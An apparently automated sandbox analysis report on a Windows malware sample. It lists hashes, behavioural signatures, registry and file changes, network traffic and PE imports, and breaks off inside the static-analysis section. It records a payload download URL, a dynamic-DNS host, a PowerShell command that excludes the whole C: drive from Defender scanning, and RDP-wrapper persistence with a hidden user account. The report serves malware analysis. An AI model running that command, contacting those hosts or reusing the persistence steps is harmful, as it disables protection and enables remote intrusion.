Exes_bf0a5d345937b3fc53bc9ee45c8e22c9_exe_2019-06-25_06_30.json

1.  
2. [*] MalFamily: ""
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe"
7. [*] File Size: 607744
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "3c9414c92e5a224b2b4b9185f46f81e619c82cc40eba94be25db6f7d663bc6de"
10. [*] MD5: "bf0a5d345937b3fc53bc9ee45c8e22c9"
11. [*] SHA1: "f99fa397c1946ce267bb16d1d48396074e20d277"
12. [*] SHA512: "96020fe343500bde7fd74b72be555efc35d2ddf8d8b8534759c461ee221319358b267102ce92aec0691a7106f58f0e0c6efffbe09112c641f3ce5b62ba7efaa3"
13. [*] CRC32: "2C5ADCDC"
14. [*] SSDEEP: "12288:Z1MThUwpGV49lAPZrMdJAJx95FrWYe2n4x/3/Xml:HSKwpu4DAhrkuP5FrWYe2n4Z3/2"
15.  
16. [*] Process Execution: [
17. "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe",
18. "powershell.exe",
19. "images.exe",
20. "powershell.exe",
21. "cmd.exe",
22. "services.exe",
23. "svchost.exe",
24. "svchost.exe",
25. "svchost.exe",
26. "lsm.exe"
27. ]
28.  
29. [*] Signatures Detected: [
30. {
31. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
32. "Details": [
33. {
34. "IP": "5.206.225.104:80"
35. },
36. {
37. "IP": "216.58.204.67:80"
38. }
39. ]
40. },
41. {
42. "Description": "Creates RWX memory",
43. "Details": []
44. },
45. {
46. "Description": "Loads a driver",
47. "Details": [
48. {
49. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
50. }
51. ]
52. },
53. {
54. "Description": "Reads data out of its own binary image",
55. "Details": [
56. {
57. "self_read": "process: images.exe, pid: 2640, offset: 0x00000000, length: 0x00094600"
58. }
59. ]
60. },
61. {
62. "Description": "A process created a hidden window",
63. "Details": [
64. {
65. "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
66. }
67. ]
68. },
69. {
70. "Description": "Drops a binary and executes it",
71. "Details": [
72. {
73. "binary": "C:\\ProgramData\\images.exe"
74. }
75. ]
76. },
77. {
78. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
79. "Details": [
80. {
81. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
82. },
83. {
84. "suspicious_request": "http://5.206.225.104/dll/upnp.exe"
85. }
86. ]
87. },
88. {
89. "Description": "Performs some HTTP requests",
90. "Details": [
91. {
92. "url": "http://5.206.225.104/dll/upnp.exe"
93. }
94. ]
95. },
96. {
97. "Description": "Code injection with CreateRemoteThread in a remote process",
98. "Details": [
99. {
100. "Injection": "images.exe(2640) -> cmd.exe(2880)"
101. }
102. ]
103. },
104. {
105. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
106. "Details": [
107. {
108. "Process": "svchost.exe (2508)"
109. }
110. ]
111. },
112. {
113. "Description": "Attempts to stop active services",
114. "Details": [
115. {
116. "servicename": "UmRdpService"
117. }
118. ]
119. },
120. {
121. "Description": "A process attempted to delay the analysis task by a long amount of time.",
122. "Details": [
123. {
124. "Process": "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe tried to sleep 1000 seconds, actually delayed analysis time by 0 seconds"
125. },
126. {
127. "Process": "images.exe tried to sleep 4003 seconds, actually delayed analysis time by 0 seconds"
128. }
129. ]
130. },
131. {
132. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
133. "Details": [
134. {
135. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 86885 times"
136. }
137. ]
138. },
139. {
140. "Description": "Installs itself for autorun at Windows startup",
141. "Details": [
142. {
143. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
144. },
145. {
146. "data": "C:\\ProgramData\\images.exe"
147. },
148. {
149. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
150. },
151. {
152. "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
153. }
154. ]
155. },
156. {
157. "Description": "Creates a hidden or system file",
158. "Details": [
159. {
160. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP"
161. }
162. ]
163. },
164. {
165. "Description": "Attempts to modify proxy settings",
166. "Details": []
167. },
168. {
169. "Description": "Creates a copy of itself",
170. "Details": [
171. {
172. "copy": "C:\\ProgramData\\images.exe"
173. }
174. ]
175. },
176. {
177. "Description": "Collects information to fingerprint the system",
178. "Details": []
179. }
180. ]
181.  
182. [*] Started Service: [
183. "TermService",
184. "UmRdpService"
185. ]
186.  
187. [*] Executed Commands: [
188. "powershell Add-MpPreference -ExclusionPath C:\\",
189. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
190. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted"
191. ]
192.  
193. [*] Mutexes: [
194. "Local\\_!MSFTHISTORY!_",
195. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
196. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
197. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
198. "Local\\WininetStartupMutex",
199. "Local\\WininetConnectionMutex",
200. "Local\\WininetProxyRegistryMutex",
201. "Global\\CLR_CASOFF_MUTEX",
202. "TSLicensingLock"
203. ]
204.  
205. [*] Modified Files: [
206. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
207. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
208. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
209. "C:\\ProgramData\\images.exe",
210. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
211. "\\??\\PIPE\\srvsvc",
212. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
213. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
214. "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\25-06-2019_01.13.22",
215. "\\??\\PIPE\\samr",
216. "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
217. "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
218. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\014MXUFI059OALDHZTJQ.temp",
219. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
220. "C:\\rdpwrap.txt",
221. "\\Device\\Termdd",
222. "\\Device\\RdpDr",
223. "\\??\\root#umbus#0000#{65a9a6cf-64cd-480b-843e-32c86e1ba19f}"
224. ]
225.  
226. [*] Deleted Files: [
227. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
228. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1428.7378156",
229. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1428.7378156",
230. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1428.7378156",
231. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
232. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2728.7424765",
233. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2728.7424765",
234. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2728.7424765"
235. ]
236.  
237. [*] Modified Registry Keys: [
238. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
239. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
240. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
241. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
242. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4",
245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\inst",
246. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
247. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
248. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\images_RASAPI32",
249. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableFileTracing",
250. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableConsoleTracing",
251. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileTracingMask",
252. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\ConsoleTracingMask",
253. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\MaxFileSize",
254. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileDirectory",
255. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
256. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\Kwsogfk",
257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rudp",
258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rpdp",
259. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
260. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
261. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
262. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
263. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
264. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
265. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
266. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Type",
267. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Start",
268. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\ErrorControl",
269. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\DisplayName",
270. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
271. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
272. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
273. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
274. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld"
275. ]
276.  
277. [*] Deleted Registry Keys: [
278. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
279. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
280. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
281. ]
282.  
283. [*] DNS Communications: [
284. {
285. "type": "A",
286. "request": "google.be",
287. "answers": [
288. {
289. "data": "216.58.204.67",
290. "type": "A"
291. }
292. ]
293. },
294. {
295. "type": "A",
296. "request": "ozcall.duckdns.org",
297. "answers": [
298. {
299. "data": "213.208.152.199",
300. "type": "A"
301. }
302. ]
303. }
304. ]
305.  
306. [*] Domains: [
307. {
308. "ip": "216.58.206.131",
309. "domain": "google.be"
310. },
311. {
312. "ip": "213.208.152.199",
313. "domain": "ozcall.duckdns.org"
314. }
315. ]
316.  
317. [*] Network Communication - ICMP: []
318.  
319. [*] Network Communication - HTTP: [
320. {
321. "count": 1,
322. "body": "",
323. "uri": "http://5.206.225.104/dll/upnp.exe",
324. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
325. "method": "GET",
326. "host": "5.206.225.104",
327. "version": "1.1",
328. "path": "/dll/upnp.exe",
329. "data": "GET /dll/upnp.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 5.206.225.104\r\nConnection: Keep-Alive\r\n\r\n",
330. "port": 80
331. }
332. ]
333.  
334. [*] Network Communication - SMTP: []
335.  
336. [*] Network Communication - Hosts: []
337.  
338. [*] Network Communication - IRC: []
339.  
340. [*] Static Analysis: {
341. "pe": {
342. "peid_signatures": null,
343. "imports": [
344. {
345. "imports": [
346. {
347. "name": "FlushFileBuffers",
348. "address": "0x43603c"
349. },
350. {
351. "name": "GetConsoleCP",
352. "address": "0x436040"
353. },
354. {
355. "name": "GetConsoleMode",
356. "address": "0x436044"
357. },
358. {
359. "name": "HeapSize",
360. "address": "0x436048"
361. },
362. {
363. "name": "HeapReAlloc",
364. "address": "0x43604c"
365. },
366. {
367. "name": "GetProcessHeap",
368. "address": "0x436050"
369. },
370. {
371. "name": "SetFilePointerEx",
372. "address": "0x436054"
373. },
374. {
375. "name": "WriteConsoleW",
376. "address": "0x436058"
377. },
378. {
379. "name": "GetStringTypeW",
380. "address": "0x43605c"
381. },
382. {
383. "name": "SetStdHandle",
384. "address": "0x436060"
385. },
386. {
387. "name": "CreateFileW",
388. "address": "0x436064"
389. },
390. {
391. "name": "AllocConsole",
392. "address": "0x436068"
393. },
394. {
395. "name": "GetGeoInfoA",
396. "address": "0x43606c"
397. },
398. {
399. "name": "K32EnumPageFilesW",
400. "address": "0x436070"
401. },
402. {
403. "name": "DefineDosDeviceW",
404. "address": "0x436074"
405. },
406. {
407. "name": "Sleep",
408. "address": "0x436078"
409. },
410. {
411. "name": "FreeEnvironmentStringsW",
412. "address": "0x43607c"
413. },
414. {
415. "name": "GetEnvironmentStringsW",
416. "address": "0x436080"
417. },
418. {
419. "name": "GetCommandLineW",
420. "address": "0x436084"
421. },
422. {
423. "name": "GetCommandLineA",
424. "address": "0x436088"
425. },
426. {
427. "name": "GetCPInfo",
428. "address": "0x43608c"
429. },
430. {
431. "name": "GetOEMCP",
432. "address": "0x436090"
433. },
434. {
435. "name": "IsValidCodePage",
436. "address": "0x436094"
437. },
438. {
439. "name": "FindNextFileA",
440. "address": "0x436098"
441. },
442. {
443. "name": "VirtualProtect",
444. "address": "0x43609c"
445. },
446. {
447. "name": "VirtualAlloc",
448. "address": "0x4360a0"
449. },
450. {
451. "name": "FindFirstFileExA",
452. "address": "0x4360a4"
453. },
454. {
455. "name": "FindClose",
456. "address": "0x4360a8"
457. },
458. {
459. "name": "CloseHandle",
460. "address": "0x4360ac"
461. },
462. {
463. "name": "GetFileType",
464. "address": "0x4360b0"
465. },
466. {
467. "name": "LCMapStringW",
468. "address": "0x4360b4"
469. },
470. {
471. "name": "HeapFree",
472. "address": "0x4360b8"
473. },
474. {
475. "name": "HeapAlloc",
476. "address": "0x4360bc"
477. },
478. {
479. "name": "GetACP",
480. "address": "0x4360c0"
481. },
482. {
483. "name": "GetModuleHandleExW",
484. "address": "0x4360c4"
485. },
486. {
487. "name": "ExitProcess",
488. "address": "0x4360c8"
489. },
490. {
491. "name": "WideCharToMultiByte",
492. "address": "0x4360cc"
493. },
494. {
495. "name": "MultiByteToWideChar",
496. "address": "0x4360d0"
497. },
498. {
499. "name": "GetModuleFileNameA",
500. "address": "0x4360d4"
501. },
502. {
503. "name": "WriteFile",
504. "address": "0x4360d8"
505. },
506. {
507. "name": "GetStdHandle",
508. "address": "0x4360dc"
509. },
510. {
511. "name": "RaiseException",
512. "address": "0x4360e0"
513. },
514. {
515. "name": "LoadLibraryExW",
516. "address": "0x4360e4"
517. },
518. {
519. "name": "GetProcAddress",
520. "address": "0x4360e8"
521. },
522. {
523. "name": "FreeLibrary",
524. "address": "0x4360ec"
525. },
526. {
527. "name": "TlsFree",
528. "address": "0x4360f0"
529. },
530. {
531. "name": "TlsSetValue",
532. "address": "0x4360f4"
533. },
534. {
535. "name": "TlsGetValue",
536. "address": "0x4360f8"
537. },
538. {
539. "name": "TlsAlloc",
540. "address": "0x4360fc"
541. },
542. {
543. "name": "InitializeCriticalSectionAndSpinCount",
544. "address": "0x436100"
545. },
546. {
547. "name": "DeleteCriticalSection",
548. "address": "0x436104"
549. },
550. {
551. "name": "DecodePointer",
552. "address": "0x436108"
553. },
554. {
555. "name": "UnhandledExceptionFilter",
556. "address": "0x43610c"
557. },
558. {
559. "name": "SetUnhandledExceptionFilter",
560. "address": "0x436110"
561. },
562. {
563. "name": "GetCurrentProcess",
564. "address": "0x436114"
565. },
566. {
567. "name": "TerminateProcess",
568. "address": "0x436118"
569. },
570. {
571. "name": "IsProcessorFeaturePresent",
572. "address": "0x43611c"
573. },
574. {
575. "name": "QueryPerformanceCounter",
576. "address": "0x436120"
577. },
578. {
579. "name": "GetCurrentProcessId",
580. "address": "0x436124"
581. },
582. {
583. "name": "GetCurrentThreadId",
584. "address": "0x436128"
585. },
586. {
587. "name": "GetSystemTimeAsFileTime",
588. "address": "0x43612c"
589. },
590. {
591. "name": "InitializeSListHead",
592. "address": "0x436130"
593. },
594. {
595. "name": "IsDebuggerPresent",
596. "address": "0x436134"
597. },
598. {
599. "name": "GetStartupInfoW",
600. "address": "0x436138"
601. },
602. {
603. "name": "GetModuleHandleW",
604. "address": "0x43613c"
605. },
606. {
607. "name": "RtlUnwind",
608. "address": "0x436140"
609. },
610. {
611. "name": "GetLastError",
612. "address": "0x436144"
613. },
614. {
615. "name": "SetLastError",
616. "address": "0x436148"
617. },
618. {
619. "name": "EnterCriticalSection",
620. "address": "0x43614c"
621. },
622. {
623. "name": "LeaveCriticalSection",
624. "address": "0x436150"
625. }
626. ],
627. "dll": "KERNEL32.dll"
628. },
629. {
630. "imports": [
631. {
632. "name": "FindWindowW",
633. "address": "0x4361b4"
634. },
635. {
636. "name": "GetTouchInputInfo",
637. "address": "0x4361b8"
638. },
639. {
640. "name": "DdeCmpStringHandles",
641. "address": "0x4361bc"
642. },
643. {
644. "name": "MessageBoxA",
645. "address": "0x4361c0"
646. }
647. ],
648. "dll": "USER32.dll"
649. },
650. {
651. "imports": [
652. {
653. "name": null,
654. "address": "0x4361e4"
655. }
656. ],
657. "dll": "WINSPOOL.DRV"
658. },
659. {
660. "imports": [
661. {
662. "name": "DuplicateToken",
663. "address": "0x436000"
664. },
665. {
666. "name": "ObjectPrivilegeAuditAlarmA",
667. "address": "0x436004"
668. },
669. {
670. "name": "PerfDecrementULongCounterValue",
671. "address": "0x436008"
672. },
673. {
674. "name": "CredUnmarshalCredentialA",
675. "address": "0x43600c"
676. }
677. ],
678. "dll": "ADVAPI32.dll"
679. },
680. {
681. "imports": [
682. {
683. "name": "VarBstrFromDate",
684. "address": "0x436170"
685. }
686. ],
687. "dll": "OLEAUT32.dll"
688. },
689. {
690. "imports": [
691. {
692. "name": "AVIStreamRelease",
693. "address": "0x436014"
694. }
695. ],
696. "dll": "AVIFIL32.dll"
697. },
698. {
699. "imports": [
700. {
701. "name": "DeregisterManageableLogClient",
702. "address": "0x4361f8"
703. }
704. ],
705. "dll": "clfsw32.dll"
706. },
707. {
708. "imports": [
709. {
710. "name": "ClusterNodeGetEnumCount",
711. "address": "0x43601c"
712. }
713. ],
714. "dll": "CLUSAPI.dll"
715. },
716. {
717. "imports": [
718. {
719. "name": "ImageList_AddMasked",
720. "address": "0x436024"
721. }
722. ],
723. "dll": "COMCTL32.dll"
724. },
725. {
726. "imports": [
727. {
728. "name": "UnDecorateSymbolNameW",
729. "address": "0x436200"
730. }
731. ],
732. "dll": "dbghelp.dll"
733. },
734. {
735. "imports": [
736. {
737. "name": "DnsDhcpRegisterHostAddrs",
738. "address": "0x43602c"
739. }
740. ],
741. "dll": "DNSAPI.dll"
742. },
743. {
744. "imports": [
745. {
746. "name": null,
747. "address": "0x436208"
748. }
749. ],
750. "dll": "dsuiext.dll"
751. },
752. {
753. "imports": [
754. {
755. "name": "GetMonitorContrast",
756. "address": "0x436210"
757. }
758. ],
759. "dll": "dxva2.dll"
760. },
761. {
762. "imports": [
763. {
764. "name": null,
765. "address": "0x436218"
766. },
767. {
768. "name": "GdipDisposeImageAttributes",
769. "address": "0x43621c"
770. },
771. {
772. "name": "GdipGetImageFlags",
773. "address": "0x436220"
774. },
775. {
776. "name": "GdipSetPathGradientPresetBlend",
777. "address": "0x436224"
778. }
779. ],
780. "dll": "gdiplus.dll"
781. },
782. {
783. "imports": [
784. {
785. "name": "NotifyAddrChange",
786. "address": "0x436034"
787. }
788. ],
789. "dll": "IPHLPAPI.DLL"
790. },
791. {
792. "imports": [
793. {
794. "name": null,
795. "address": "0x436158"
796. }
797. ],
798. "dll": "MAPI32.dll"
799. },
800. {
801. "imports": [
802. {
803. "name": "MprAdminInterfaceGetCredentials",
804. "address": "0x436160"
805. }
806. ],
807. "dll": "MPRAPI.dll"
808. },
809. {
810. "imports": [
811. {
812. "name": "DRMGetEnvironmentInfo",
813. "address": "0x43622c"
814. }
815. ],
816. "dll": "msdrm.dll"
817. },
818. {
819. "imports": [
820. {
821. "name": "ICInfo",
822. "address": "0x436168"
823. }
824. ],
825. "dll": "MSVFW32.dll"
826. },
827. {
828. "imports": [
829. {
830. "name": "glColor4sv",
831. "address": "0x436178"
832. }
833. ],
834. "dll": "OPENGL32.dll"
835. },
836. {
837. "imports": [
838. {
839. "name": "VariantToUInt32",
840. "address": "0x436180"
841. }
842. ],
843. "dll": "PROPSYS.dll"
844. },
845. {
846. "imports": [
847. {
848. "name": "ResUtilSetResourceServiceEnvironment",
849. "address": "0x436188"
850. }
851. ],
852. "dll": "RESUTILS.dll"
853. },
854. {
855. "imports": [
856. {
857. "name": "RpcServerListen",
858. "address": "0x436190"
859. },
860. {
861. "name": "NdrConformantStringMemorySize",
862. "address": "0x436194"
863. }
864. ],
865. "dll": "RPCRT4.dll"
866. },
867. {
868. "imports": [
869. {
870. "name": "MgmDeleteGroupMembershipEntry",
871. "address": "0x436234"
872. }
873. ],
874. "dll": "rtm.dll"
875. },
876. {
877. "imports": [
878. {
879. "name": "CM_Add_Range",
880. "address": "0x43619c"
881. }
882. ],
883. "dll": "SETUPAPI.dll"
884. },
885. {
886. "imports": [
887. {
888. "name": "DllRegisterWindowClasses",
889. "address": "0x4361a4"
890. }
891. ],
892. "dll": "SHDOCVW.dll"
893. },
894. {
895. "imports": [
896. {
897. "name": "lineGetAddressCaps",
898. "address": "0x4361ac"
899. }
900. ],
901. "dll": "TAPI32.dll"
902. },
903. {
904. "imports": [
905. {
906. "name": "WsCreateMessageForChannel",
907. "address": "0x43623c"
908. }
909. ],
910. "dll": "webservices.dll"
911. },
912. {
913. "imports": [
914. {
915. "name": "WinBioControlUnit",
916. "address": "0x436244"
917. }
918. ],
919. "dll": "winbio.dll"
920. },
921. {
922. "imports": [
923. {
924. "name": "IWICMetadataQueryReader_GetLocation_Proxy",
925. "address": "0x4361ec"
926. },
927. {
928. "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
929. "address": "0x4361f0"
930. }
931. ],
932. "dll": "WindowsCodecs.dll"
933. },
934. {
935. "imports": [
936. {
937. "name": "WinHttpQueryOption",
938. "address": "0x4361c8"
939. }
940. ],
941. "dll": "WINHTTP.dll"
942. },
943. {
944. "imports": [
945. {
946. "name": "FindNextUrlCacheContainerW",
947. "address": "0x4361d0"
948. },
949. {
950. "name": "InternetCheckConnectionA",
951. "address": "0x4361d4"
952. }
953. ],
954. "dll": "WININET.dll"
955. },
956. {
957. "imports": [
958. {
959. "name": "waveOutGetErrorTextW",
960. "address": "0x4361dc"
961. }
962. ],
963. "dll": "WINMM.dll"
964. },
965. {
966. "imports": [
967. {
968. "name": null,
969. "address": "0x43624c"
970. }
971. ],
972. "dll": "wsnmp32.dll"
973. }
974. ],
975. "digital_signers": null,
976. "exported_dll_name": null,
977. "actual_checksum": "0x000a0d78",
978. "overlay": null,
979. "imagebase": "0x00400000",
980. "reported_checksum": "0x00000000",
981. "icon_hash": null,
982. "entrypoint": "0x0042685e",
983. "timestamp": "2019-06-23 22:20:50",
984. "osversion": "5.1",
985. "sections": [
986. {
987. "name": ".text",
988. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
989. "virtual_address": "0x00001000",
990. "size_of_data": "0x00034800",
991. "entropy": "6.32",
992. "raw_address": "0x00000400",
993. "virtual_size": "0x0003461b",
994. "characteristics_raw": "0x60000020"
995. },
996. {
997. "name": ".rdata",
998. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
999. "virtual_address": "0x00036000",
1000. "size_of_data": "0x00008c00",
1001. "entropy": "5.45",
1002. "raw_address": "0x00034c00",
1003. "virtual_size": "0x00008bd6",
1004. "characteristics_raw": "0x40000040"
1005. },
1006. {
1007. "name": ".data",
1008. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1009. "virtual_address": "0x0003f000",
1010. "size_of_data": "0x0004ee00",
1011. "entropy": "6.08",
1012. "raw_address": "0x0003d800",
1013. "virtual_size": "0x0005045c",
1014. "characteristics_raw": "0xc0000040"
1015. },
1016. {
1017. "name": ".rsrc",
1018. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
1019. "virtual_address": "0x00090000",
1020. "size_of_data": "0x00000600",
1021. "entropy": "4.70",
1022. "raw_address": "0x0008c600",
1023. "virtual_size": "0x00000488",
1024. "characteristics_raw": "0x40000040"
1025. },
1026. {
1027. "name": ".reloc",
1028. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
1029. "virtual_address": "0x00091000",
1030. "size_of_data": "0x00007a00",
1031. "entropy": "6.45",
1032. "raw_address": "0x0008cc00",
1033. "virtual_size": "0x0000799c",
1034. "characteristics_raw": "0x42000040"
1035. }
1036. ],
1037. "resources": [],
1038. "dirents": [
1039. {
1040. "virtual_address": "0x00000000",
1041. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
1042. "size": "0x00000000"
1043. },
1044. {
1045. "virtual_address": "0x0003dc34",
1046. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
1047. "size": "0x000002bc"
1048. },
1049. {
1050. "virtual_address": "0x00090000",
1051. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
1052. "size": "0x00000488"
1053. },
1054. {
1055. "virtual_address": "0x00000000",
1056. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
1057. "size": "0x00000000"
1058. },
1059. {
1060. "virtual_address": "0x00000000",
1061. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
1062. "size": "0x00000000"
